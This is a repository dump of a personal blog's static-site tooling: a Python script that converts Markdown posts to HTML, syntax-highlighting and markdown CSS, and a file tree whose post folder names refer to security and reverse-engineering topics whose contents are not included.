├── .gitignore ├── README.md ├── build.py ├── css ├── code.css └── markdown.css ├── index.html ├── posts ├── 2013-03-08-wpa2-vulnerability-tplink │ ├── _main.md │ └── index.html ├── 2013-03-30-virtualdj-73-buffer-overflow │ ├── _main.md │ └── index.html ├── 2013-03-31-wpa2-vulnerability-linksys-dlink │ ├── _main.md │ └── index.html ├── 2013-04-20-virtualdj-74-buffer-overflow │ ├── _main.md │ └── index.html ├── 2016-03-16-ps3-gpu-exploit │ ├── _main.md │ └── index.html ├── 2016-08-22-observations │ ├── _main.md │ └── index.html ├── 2016-09-14-jit-compiled-maps │ ├── _main.md │ └── index.html ├── 2016-10-12-xchg-rax-rax-solutions │ ├── _main.md │ ├── index.html │ ├── xorpd_0x3c_hilbert.png │ ├── xorpd_0x3c_hilbert.py │ ├── xorpd_0x3d_morton.png │ ├── xorpd_0x3d_morton.py │ └── xorpd_0x3f_hanoi.png ├── 2017-07-19-googlectf-2017-moon │ ├── _main.md │ ├── _main.pdf │ ├── apitrace.png │ ├── bruteforcer.py │ ├── ida.png │ ├── index.html │ ├── latex-1.png │ ├── latex-2.png │ ├── moon.glsl │ └── moon.zip ├── 2018-04-18-lle-vs-hle │ ├── _main.md │ └── index.html ├── 2019-02-16-cell-miner-alu │ ├── _main.md │ ├── arithmetic.s │ └── index.html └── 2024-04-28-quotes │ └── _main.md ├── requirements.txt └── templates ├── index.html └── post.html /.gitignore: -------------------------------------------------------------------------------- 1 | *.ffs_db 2 | debug.log 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Blog 2 | ==== 3 | 4 | Articles and resources of my blog. Written in Markdown. 5 | 6 | Licensed under [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/). 
#!/usr/bin/env python3
"""Static site builder for the blog.

Every ``posts/<name>/_main.md`` is converted to ``posts/<name>/index.html``
through ``templates/post.html``; afterwards the top-level ``index.html`` is
generated from ``templates/index.html`` with one table row per post.
"""

import os

import markdown
# Not referenced directly in this script.
# NOTE(review): presumably imported so that a missing Pygments install fails
# early (the codehilite extension highlights with it) - confirm.
import pygments  # noqa: F401

# Globals
# Metadata dictionaries of the posts built so far, in build order.
# Filled by build_post_markdown() and consumed by build_index().
index = []

# Metadata keys that the post template substitutes.
REQUIRED_METADATA = ('date', 'title', 'author')

# Markdown
# NOTE(review): recent Python-Markdown releases appear to ignore `encoding`
# on the constructor; it is kept (with the 'utf=8' typo fixed) for
# compatibility - confirm against the pinned version in requirements.txt.
md = markdown.Markdown(
    encoding='utf-8',
    output_format='html5',
    extensions=[
        'markdown.extensions.codehilite',
        'markdown.extensions.fenced_code',
        'markdown.extensions.meta',
        'markdown.extensions.tables',
        'markdown.extensions.toc',
    ])


# Build
def build_post_markdown(source, target):
    """Render one Markdown post to HTML and record its metadata.

    Args:
        source: Path of the Markdown file to read.
        target: Path of the HTML file to write. It is also stored as the
            post's ``link`` entry in the global ``index``.

    Raises:
        KeyError: If the post metadata lacks ``date``, ``title`` or
            ``author``.
    """
    with open(source, 'r', encoding='utf-8') as f:
        text = f.read()

    # The converter instance is shared by all posts; reset it so state from
    # the previous document (e.g. heading ids handed out by the toc
    # extension) does not leak into this one.
    md.reset()
    content = md.convert(text)

    metadata = {'link': target}
    # The meta extension stores every value as a list of lines; only the
    # first line is used.
    for key, values in md.Meta.items():
        metadata[key] = values[0]

    # Validate before touching `index` so a broken post is never listed.
    missing = [key for key in REQUIRED_METADATA if key not in metadata]
    if missing:
        raise KeyError('%s: missing metadata %s' % (source, ', '.join(missing)))
    index.append(metadata)

    with open('templates/post.html', 'r', encoding='utf-8') as f:
        post = f.read()
    # $content is substituted last so placeholders that happen to appear in
    # the rendered article are left alone.
    post = post.replace('$date', metadata['date'])
    post = post.replace('$title', metadata['title'])
    post = post.replace('$author', metadata['author'])
    post = post.replace('$content', content)
    with open(target, 'w', encoding='utf-8') as f:
        f.write('\n')
        f.write(post)


def build_post(path):
    """Build the post stored in directory `path`, if it has a `_main.md`.

    Args:
        path: Directory of a single post. Directories (or plain files)
            without a `_main.md` inside are silently skipped.
    """
    source = os.path.join(path, '_main.md')
    target = os.path.join(path, 'index.html')
    if os.path.isfile(source):
        print('Building: %s' % source)
        build_post_markdown(source, target)


def build_index(target):
    """Write the site index listing every post recorded in ``index``.

    Posts are listed in reverse build order. The rows replace the ``$posts``
    placeholder of ``templates/index.html``.

    Args:
        target: Path of the HTML file to write.
    """
    # NOTE(review): the table markup below is reconstructed. The version
    # under review formatted three values into a two-placeholder string
    # (a TypeError) and carried no visible tags - confirm the markup against
    # the published index.html and templates/index.html.
    rows = ['<tr><th>Date</th><th>Article</th></tr>\n']
    for post in reversed(index):
        # Link to the post directory rather than to index.html itself, and
        # use URL separators even when os.path.join produced backslashes.
        link = post['link'].replace('index.html', '').replace(os.sep, '/')
        rows.append('<tr><td>%s</td><td><a href="%s">%s</a></td></tr>\n' % (
            post['date'], link, post['title']))
    posts = '<table>\n%s</table>\n' % ''.join(rows)

    with open('templates/index.html', 'r', encoding='utf-8') as f:
        html = f.read()
    html = html.replace('$posts', posts)
    with open(target, 'w', encoding='utf-8') as f:
        f.write('\n')
        f.write(html)


def build_all():
    """Build every post under ``posts/`` and then the site index."""
    # Start from a clean slate so repeated calls do not duplicate rows.
    index.clear()
    # Create posts
    posts = 'posts'
    # os.listdir() returns entries in arbitrary order. Post directories are
    # named with a leading YYYY-MM-DD date, so sorting the names yields
    # chronological order (build_index() then lists newest first).
    for name in sorted(os.listdir(posts)):
        build_post(os.path.join(posts, name))
    # Create index
    build_index('index.html')


def main():
    """Script entry point."""
    build_all()


if __name__ == '__main__':
    main()
.codehilite .gs { font-weight: bold } /* Generic.Strong */ 21 | .codehilite .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ 22 | .codehilite .gt { color: #0044DD } /* Generic.Traceback */ 23 | .codehilite .kc { color: #008000; font-weight: bold } /* Keyword.Constant */ 24 | .codehilite .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */ 25 | .codehilite .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */ 26 | .codehilite .kp { color: #008000 } /* Keyword.Pseudo */ 27 | .codehilite .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */ 28 | .codehilite .kt { color: #B00040 } /* Keyword.Type */ 29 | .codehilite .m { color: #666666 } /* Literal.Number */ 30 | .codehilite .s { color: #BA2121 } /* Literal.String */ 31 | .codehilite .na { color: #7D9029 } /* Name.Attribute */ 32 | .codehilite .nb { color: #008000 } /* Name.Builtin */ 33 | .codehilite .nc { color: #0000FF; font-weight: bold } /* Name.Class */ 34 | .codehilite .no { color: #880000 } /* Name.Constant */ 35 | .codehilite .nd { color: #AA22FF } /* Name.Decorator */ 36 | .codehilite .ni { color: #999999; font-weight: bold } /* Name.Entity */ 37 | .codehilite .ne { color: #D2413A; font-weight: bold } /* Name.Exception */ 38 | .codehilite .nf { color: #0000FF } /* Name.Function */ 39 | .codehilite .nl { color: #A0A000 } /* Name.Label */ 40 | .codehilite .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */ 41 | .codehilite .nt { color: #008000; font-weight: bold } /* Name.Tag */ 42 | .codehilite .nv { color: #19177C } /* Name.Variable */ 43 | .codehilite .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */ 44 | .codehilite .w { color: #bbbbbb } /* Text.Whitespace */ 45 | .codehilite .mb { color: #666666 } /* Literal.Number.Bin */ 46 | .codehilite .mf { color: #666666 } /* Literal.Number.Float */ 47 | .codehilite .mh { color: #666666 } /* Literal.Number.Hex */ 48 | .codehilite .mi { color: #666666 } /* Literal.Number.Integer */ 49 | 
.codehilite .mo { color: #666666 } /* Literal.Number.Oct */ 50 | .codehilite .sa { color: #BA2121 } /* Literal.String.Affix */ 51 | .codehilite .sb { color: #BA2121 } /* Literal.String.Backtick */ 52 | .codehilite .sc { color: #BA2121 } /* Literal.String.Char */ 53 | .codehilite .dl { color: #BA2121 } /* Literal.String.Delimiter */ 54 | .codehilite .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */ 55 | .codehilite .s2 { color: #BA2121 } /* Literal.String.Double */ 56 | .codehilite .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */ 57 | .codehilite .sh { color: #BA2121 } /* Literal.String.Heredoc */ 58 | .codehilite .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */ 59 | .codehilite .sx { color: #008000 } /* Literal.String.Other */ 60 | .codehilite .sr { color: #BB6688 } /* Literal.String.Regex */ 61 | .codehilite .s1 { color: #BA2121 } /* Literal.String.Single */ 62 | .codehilite .ss { color: #19177C } /* Literal.String.Symbol */ 63 | .codehilite .bp { color: #008000 } /* Name.Builtin.Pseudo */ 64 | .codehilite .fm { color: #0000FF } /* Name.Function.Magic */ 65 | .codehilite .vc { color: #19177C } /* Name.Variable.Class */ 66 | .codehilite .vg { color: #19177C } /* Name.Variable.Global */ 67 | .codehilite .vi { color: #19177C } /* Name.Variable.Instance */ 68 | .codehilite .vm { color: #19177C } /* Name.Variable.Magic */ 69 | .codehilite .il { color: #666666 } /* Literal.Number.Integer.Long */ 70 | -------------------------------------------------------------------------------- /css/markdown.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: octicons-link; 3 | src: 
url(data:font/woff;charset=utf-8;base64,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) format('woff'); 4 | } 5 | 6 | .markdown-body .octicon { 7 | display: inline-block; 8 | fill: currentColor; 9 | vertical-align: text-bottom; 10 | } 11 | 12 | .markdown-body .anchor { 13 | float: left; 14 | line-height: 1; 15 | margin-left: -20px; 16 | padding-right: 4px; 17 | } 18 | 19 | .markdown-body .anchor:focus { 20 | outline: none; 21 | } 22 | 23 | .markdown-body h1 .octicon-link, 24 | .markdown-body h2 .octicon-link, 25 | .markdown-body h3 .octicon-link, 26 | .markdown-body h4 .octicon-link, 27 | .markdown-body h5 .octicon-link, 28 | .markdown-body h6 .octicon-link { 29 | color: #1b1f23; 30 | vertical-align: middle; 31 | visibility: hidden; 32 | } 33 | 34 | .markdown-body h1:hover .anchor, 35 | .markdown-body h2:hover .anchor, 36 | .markdown-body h3:hover .anchor, 37 | .markdown-body h4:hover .anchor, 38 | .markdown-body h5:hover .anchor, 39 | .markdown-body h6:hover .anchor { 40 | text-decoration: none; 41 | } 42 | 43 | .markdown-body h1:hover .anchor .octicon-link, 44 | .markdown-body h2:hover .anchor .octicon-link, 45 | .markdown-body h3:hover .anchor .octicon-link, 46 | .markdown-body h4:hover .anchor .octicon-link, 47 | .markdown-body h5:hover .anchor .octicon-link, 48 | .markdown-body h6:hover .anchor .octicon-link { 49 | visibility: visible; 50 | } 51 | 52 | .markdown-body { 53 | -ms-text-size-adjust: 100%; 54 | -webkit-text-size-adjust: 100%; 55 | color: #24292e; 56 | line-height: 1.5; 57 | font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol; 58 | font-size: 16px; 59 | line-height: 1.5; 60 | word-wrap: break-word; 61 | } 62 | 63 | .markdown-body .pl-c { 64 | color: #6a737d; 65 | } 66 | 67 | .markdown-body .pl-c1, 68 | .markdown-body 
.pl-s .pl-v { 69 | color: #005cc5; 70 | } 71 | 72 | .markdown-body .pl-e, 73 | .markdown-body .pl-en { 74 | color: #6f42c1; 75 | } 76 | 77 | .markdown-body .pl-s .pl-s1, 78 | .markdown-body .pl-smi { 79 | color: #24292e; 80 | } 81 | 82 | .markdown-body .pl-ent { 83 | color: #22863a; 84 | } 85 | 86 | .markdown-body .pl-k { 87 | color: #d73a49; 88 | } 89 | 90 | .markdown-body .pl-pds, 91 | .markdown-body .pl-s, 92 | .markdown-body .pl-s .pl-pse .pl-s1, 93 | .markdown-body .pl-sr, 94 | .markdown-body .pl-sr .pl-cce, 95 | .markdown-body .pl-sr .pl-sra, 96 | .markdown-body .pl-sr .pl-sre { 97 | color: #032f62; 98 | } 99 | 100 | .markdown-body .pl-smw, 101 | .markdown-body .pl-v { 102 | color: #e36209; 103 | } 104 | 105 | .markdown-body .pl-bu { 106 | color: #b31d28; 107 | } 108 | 109 | .markdown-body .pl-ii { 110 | background-color: #b31d28; 111 | color: #fafbfc; 112 | } 113 | 114 | .markdown-body .pl-c2 { 115 | background-color: #d73a49; 116 | color: #fafbfc; 117 | } 118 | 119 | .markdown-body .pl-c2:before { 120 | content: "^M"; 121 | } 122 | 123 | .markdown-body .pl-sr .pl-cce { 124 | color: #22863a; 125 | font-weight: 700; 126 | } 127 | 128 | .markdown-body .pl-ml { 129 | color: #735c0f; 130 | } 131 | 132 | .markdown-body .pl-mh, 133 | .markdown-body .pl-mh .pl-en, 134 | .markdown-body .pl-ms { 135 | color: #005cc5; 136 | font-weight: 700; 137 | } 138 | 139 | .markdown-body .pl-mi { 140 | color: #24292e; 141 | font-style: italic; 142 | } 143 | 144 | .markdown-body .pl-mb { 145 | color: #24292e; 146 | font-weight: 700; 147 | } 148 | 149 | .markdown-body .pl-md { 150 | background-color: #ffeef0; 151 | color: #b31d28; 152 | } 153 | 154 | .markdown-body .pl-mi1 { 155 | background-color: #f0fff4; 156 | color: #22863a; 157 | } 158 | 159 | .markdown-body .pl-mc { 160 | background-color: #ffebda; 161 | color: #e36209; 162 | } 163 | 164 | .markdown-body .pl-mi2 { 165 | background-color: #005cc5; 166 | color: #f6f8fa; 167 | } 168 | 169 | .markdown-body .pl-mdr { 170 | color: 
#6f42c1; 171 | font-weight: 700; 172 | } 173 | 174 | .markdown-body .pl-ba { 175 | color: #586069; 176 | } 177 | 178 | .markdown-body .pl-sg { 179 | color: #959da5; 180 | } 181 | 182 | .markdown-body .pl-corl { 183 | color: #032f62; 184 | text-decoration: underline; 185 | } 186 | 187 | .markdown-body details { 188 | display: block; 189 | } 190 | 191 | .markdown-body summary { 192 | display: list-item; 193 | } 194 | 195 | .markdown-body a { 196 | background-color: transparent; 197 | } 198 | 199 | .markdown-body a:active, 200 | .markdown-body a:hover { 201 | outline-width: 0; 202 | } 203 | 204 | .markdown-body strong { 205 | font-weight: inherit; 206 | font-weight: bolder; 207 | } 208 | 209 | .markdown-body h1 { 210 | font-size: 2em; 211 | margin: .67em 0; 212 | } 213 | 214 | .markdown-body img { 215 | border-style: none; 216 | } 217 | 218 | .markdown-body code, 219 | .markdown-body kbd, 220 | .markdown-body pre { 221 | font-family: monospace,monospace; 222 | font-size: 1em; 223 | } 224 | 225 | .markdown-body hr { 226 | box-sizing: content-box; 227 | height: 0; 228 | overflow: visible; 229 | } 230 | 231 | .markdown-body input { 232 | font: inherit; 233 | margin: 0; 234 | } 235 | 236 | .markdown-body input { 237 | overflow: visible; 238 | } 239 | 240 | .markdown-body [type=checkbox] { 241 | box-sizing: border-box; 242 | padding: 0; 243 | } 244 | 245 | .markdown-body * { 246 | box-sizing: border-box; 247 | } 248 | 249 | .markdown-body input { 250 | font-family: inherit; 251 | font-size: inherit; 252 | line-height: inherit; 253 | } 254 | 255 | .markdown-body a { 256 | color: #0366d6; 257 | text-decoration: none; 258 | } 259 | 260 | .markdown-body a:hover { 261 | text-decoration: underline; 262 | } 263 | 264 | .markdown-body strong { 265 | font-weight: 600; 266 | } 267 | 268 | .markdown-body hr { 269 | background: transparent; 270 | border: 0; 271 | border-bottom: 1px solid #dfe2e5; 272 | height: 0; 273 | margin: 15px 0; 274 | overflow: hidden; 275 | } 276 | 277 | 
.markdown-body hr:before { 278 | content: ""; 279 | display: table; 280 | } 281 | 282 | .markdown-body hr:after { 283 | clear: both; 284 | content: ""; 285 | display: table; 286 | } 287 | 288 | .markdown-body table { 289 | border-collapse: collapse; 290 | border-spacing: 0; 291 | } 292 | 293 | .markdown-body td, 294 | .markdown-body th { 295 | padding: 0; 296 | } 297 | 298 | .markdown-body details summary { 299 | cursor: pointer; 300 | } 301 | 302 | .markdown-body h1, 303 | .markdown-body h2, 304 | .markdown-body h3, 305 | .markdown-body h4, 306 | .markdown-body h5, 307 | .markdown-body h6 { 308 | margin-bottom: 0; 309 | margin-top: 0; 310 | } 311 | 312 | .markdown-body h1 { 313 | font-size: 32px; 314 | } 315 | 316 | .markdown-body h1, 317 | .markdown-body h2 { 318 | font-weight: 600; 319 | } 320 | 321 | .markdown-body h2 { 322 | font-size: 24px; 323 | } 324 | 325 | .markdown-body h3 { 326 | font-size: 20px; 327 | } 328 | 329 | .markdown-body h3, 330 | .markdown-body h4 { 331 | font-weight: 600; 332 | } 333 | 334 | .markdown-body h4 { 335 | font-size: 16px; 336 | } 337 | 338 | .markdown-body h5 { 339 | font-size: 14px; 340 | } 341 | 342 | .markdown-body h5, 343 | .markdown-body h6 { 344 | font-weight: 600; 345 | } 346 | 347 | .markdown-body h6 { 348 | font-size: 12px; 349 | } 350 | 351 | .markdown-body p { 352 | margin-bottom: 10px; 353 | margin-top: 0; 354 | } 355 | 356 | .markdown-body blockquote { 357 | margin: 0; 358 | } 359 | 360 | .markdown-body ol, 361 | .markdown-body ul { 362 | margin-bottom: 0; 363 | margin-top: 0; 364 | padding-left: 0; 365 | } 366 | 367 | .markdown-body ol ol, 368 | .markdown-body ul ol { 369 | list-style-type: lower-roman; 370 | } 371 | 372 | .markdown-body ol ol ol, 373 | .markdown-body ol ul ol, 374 | .markdown-body ul ol ol, 375 | .markdown-body ul ul ol { 376 | list-style-type: lower-alpha; 377 | } 378 | 379 | .markdown-body dd { 380 | margin-left: 0; 381 | } 382 | 383 | .markdown-body code, 384 | .markdown-body pre { 385 | 
font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 386 | font-size: 12px; 387 | } 388 | 389 | .markdown-body pre { 390 | margin-bottom: 0; 391 | margin-top: 0; 392 | } 393 | 394 | .markdown-body input::-webkit-inner-spin-button, 395 | .markdown-body input::-webkit-outer-spin-button { 396 | -webkit-appearance: none; 397 | appearance: none; 398 | margin: 0; 399 | } 400 | 401 | .markdown-body .border { 402 | border: 1px solid #e1e4e8!important; 403 | } 404 | 405 | .markdown-body .border-0 { 406 | border: 0!important; 407 | } 408 | 409 | .markdown-body .border-bottom { 410 | border-bottom: 1px solid #e1e4e8!important; 411 | } 412 | 413 | .markdown-body .rounded-1 { 414 | border-radius: 3px!important; 415 | } 416 | 417 | .markdown-body .bg-white { 418 | background-color: #fff!important; 419 | } 420 | 421 | .markdown-body .bg-gray-light { 422 | background-color: #fafbfc!important; 423 | } 424 | 425 | .markdown-body .text-gray-light { 426 | color: #6a737d!important; 427 | } 428 | 429 | .markdown-body .mb-0 { 430 | margin-bottom: 0!important; 431 | } 432 | 433 | .markdown-body .my-2 { 434 | margin-bottom: 8px!important; 435 | margin-top: 8px!important; 436 | } 437 | 438 | .markdown-body .pl-0 { 439 | padding-left: 0!important; 440 | } 441 | 442 | .markdown-body .py-0 { 443 | padding-bottom: 0!important; 444 | padding-top: 0!important; 445 | } 446 | 447 | .markdown-body .pl-1 { 448 | padding-left: 4px!important; 449 | } 450 | 451 | .markdown-body .pl-2 { 452 | padding-left: 8px!important; 453 | } 454 | 455 | .markdown-body .py-2 { 456 | padding-bottom: 8px!important; 457 | padding-top: 8px!important; 458 | } 459 | 460 | .markdown-body .pl-3, 461 | .markdown-body .px-3 { 462 | padding-left: 16px!important; 463 | } 464 | 465 | .markdown-body .px-3 { 466 | padding-right: 16px!important; 467 | } 468 | 469 | .markdown-body .pl-4 { 470 | padding-left: 24px!important; 471 | } 472 | 473 | .markdown-body .pl-5 { 474 | padding-left: 32px!important; 475 | } 
476 | 477 | .markdown-body .pl-6 { 478 | padding-left: 40px!important; 479 | } 480 | 481 | .markdown-body .f6 { 482 | font-size: 12px!important; 483 | } 484 | 485 | .markdown-body .lh-condensed { 486 | line-height: 1.25!important; 487 | } 488 | 489 | .markdown-body .text-bold { 490 | font-weight: 600!important; 491 | } 492 | 493 | .markdown-body:before { 494 | content: ""; 495 | display: table; 496 | } 497 | 498 | .markdown-body:after { 499 | clear: both; 500 | content: ""; 501 | display: table; 502 | } 503 | 504 | .markdown-body>:first-child { 505 | margin-top: 0!important; 506 | } 507 | 508 | .markdown-body>:last-child { 509 | margin-bottom: 0!important; 510 | } 511 | 512 | .markdown-body a:not([href]) { 513 | color: inherit; 514 | text-decoration: none; 515 | } 516 | 517 | .markdown-body blockquote, 518 | .markdown-body dl, 519 | .markdown-body ol, 520 | .markdown-body p, 521 | .markdown-body pre, 522 | .markdown-body table, 523 | .markdown-body ul { 524 | margin-bottom: 16px; 525 | margin-top: 0; 526 | } 527 | 528 | .markdown-body hr { 529 | background-color: #e1e4e8; 530 | border: 0; 531 | height: .25em; 532 | margin: 24px 0; 533 | padding: 0; 534 | } 535 | 536 | .markdown-body blockquote { 537 | border-left: .25em solid #dfe2e5; 538 | color: #6a737d; 539 | padding: 0 1em; 540 | } 541 | 542 | .markdown-body blockquote>:first-child { 543 | margin-top: 0; 544 | } 545 | 546 | .markdown-body blockquote>:last-child { 547 | margin-bottom: 0; 548 | } 549 | 550 | .markdown-body kbd { 551 | background-color: #fafbfc; 552 | border: 1px solid #c6cbd1; 553 | border-bottom-color: #959da5; 554 | border-radius: 3px; 555 | box-shadow: inset 0 -1px 0 #959da5; 556 | color: #444d56; 557 | display: inline-block; 558 | font-size: 11px; 559 | line-height: 10px; 560 | padding: 3px 5px; 561 | vertical-align: middle; 562 | } 563 | 564 | .markdown-body h1, 565 | .markdown-body h2, 566 | .markdown-body h3, 567 | .markdown-body h4, 568 | .markdown-body h5, 569 | .markdown-body h6 { 570 | 
font-weight: 600; 571 | line-height: 1.25; 572 | margin-bottom: 16px; 573 | margin-top: 24px; 574 | } 575 | 576 | .markdown-body h1 { 577 | font-size: 2em; 578 | } 579 | 580 | .markdown-body h1, 581 | .markdown-body h2 { 582 | border-bottom: 1px solid #eaecef; 583 | padding-bottom: .3em; 584 | } 585 | 586 | .markdown-body h2 { 587 | font-size: 1.5em; 588 | } 589 | 590 | .markdown-body h3 { 591 | font-size: 1.25em; 592 | } 593 | 594 | .markdown-body h4 { 595 | font-size: 1em; 596 | } 597 | 598 | .markdown-body h5 { 599 | font-size: .875em; 600 | } 601 | 602 | .markdown-body h6 { 603 | color: #6a737d; 604 | font-size: .85em; 605 | } 606 | 607 | .markdown-body ol, 608 | .markdown-body ul { 609 | padding-left: 2em; 610 | } 611 | 612 | .markdown-body ol ol, 613 | .markdown-body ol ul, 614 | .markdown-body ul ol, 615 | .markdown-body ul ul { 616 | margin-bottom: 0; 617 | margin-top: 0; 618 | } 619 | 620 | .markdown-body li { 621 | word-wrap: break-all; 622 | } 623 | 624 | .markdown-body li>p { 625 | margin-top: 16px; 626 | } 627 | 628 | .markdown-body li+li { 629 | margin-top: .25em; 630 | } 631 | 632 | .markdown-body dl { 633 | padding: 0; 634 | } 635 | 636 | .markdown-body dl dt { 637 | font-size: 1em; 638 | font-style: italic; 639 | font-weight: 600; 640 | margin-top: 16px; 641 | padding: 0; 642 | } 643 | 644 | .markdown-body dl dd { 645 | margin-bottom: 16px; 646 | padding: 0 16px; 647 | } 648 | 649 | .markdown-body table { 650 | display: block; 651 | overflow: auto; 652 | width: 100%; 653 | } 654 | 655 | .markdown-body table th { 656 | font-weight: 600; 657 | } 658 | 659 | .markdown-body table td, 660 | .markdown-body table th { 661 | border: 1px solid #dfe2e5; 662 | padding: 6px 13px; 663 | } 664 | 665 | .markdown-body table tr { 666 | background-color: #fff; 667 | border-top: 1px solid #c6cbd1; 668 | } 669 | 670 | .markdown-body table tr:nth-child(2n) { 671 | background-color: #f6f8fa; 672 | } 673 | 674 | .markdown-body img { 675 | background-color: #fff; 676 | 
box-sizing: content-box; 677 | max-width: 100%; 678 | } 679 | 680 | .markdown-body img[align=right] { 681 | padding-left: 20px; 682 | } 683 | 684 | .markdown-body img[align=left] { 685 | padding-right: 20px; 686 | } 687 | 688 | .markdown-body code { 689 | background-color: rgba(27,31,35,.05); 690 | border-radius: 3px; 691 | font-size: 85%; 692 | margin: 0; 693 | padding: .2em .4em; 694 | } 695 | 696 | .markdown-body pre { 697 | word-wrap: normal; 698 | } 699 | 700 | .markdown-body pre>code { 701 | background: transparent; 702 | border: 0; 703 | font-size: 100%; 704 | margin: 0; 705 | padding: 0; 706 | white-space: pre; 707 | word-break: normal; 708 | } 709 | 710 | .markdown-body .highlight { 711 | margin-bottom: 16px; 712 | } 713 | 714 | .markdown-body .highlight pre { 715 | margin-bottom: 0; 716 | word-break: normal; 717 | } 718 | 719 | .markdown-body .highlight pre, 720 | .markdown-body pre { 721 | background-color: #f6f8fa; 722 | border-radius: 3px; 723 | font-size: 85%; 724 | line-height: 1.45; 725 | overflow: auto; 726 | padding: 16px; 727 | } 728 | 729 | .markdown-body pre code { 730 | background-color: transparent; 731 | border: 0; 732 | display: inline; 733 | line-height: inherit; 734 | margin: 0; 735 | max-width: auto; 736 | overflow: visible; 737 | padding: 0; 738 | word-wrap: normal; 739 | } 740 | 741 | .markdown-body .commit-tease-sha { 742 | color: #444d56; 743 | display: inline-block; 744 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 745 | font-size: 90%; 746 | } 747 | 748 | .markdown-body .blob-wrapper { 749 | border-bottom-left-radius: 3px; 750 | border-bottom-right-radius: 3px; 751 | overflow-x: auto; 752 | overflow-y: hidden; 753 | } 754 | 755 | .markdown-body .blob-wrapper-embedded { 756 | max-height: 240px; 757 | overflow-y: auto; 758 | } 759 | 760 | .markdown-body .blob-num { 761 | -moz-user-select: none; 762 | -ms-user-select: none; 763 | -webkit-user-select: none; 764 | color: rgba(27,31,35,.3); 765 | cursor: 
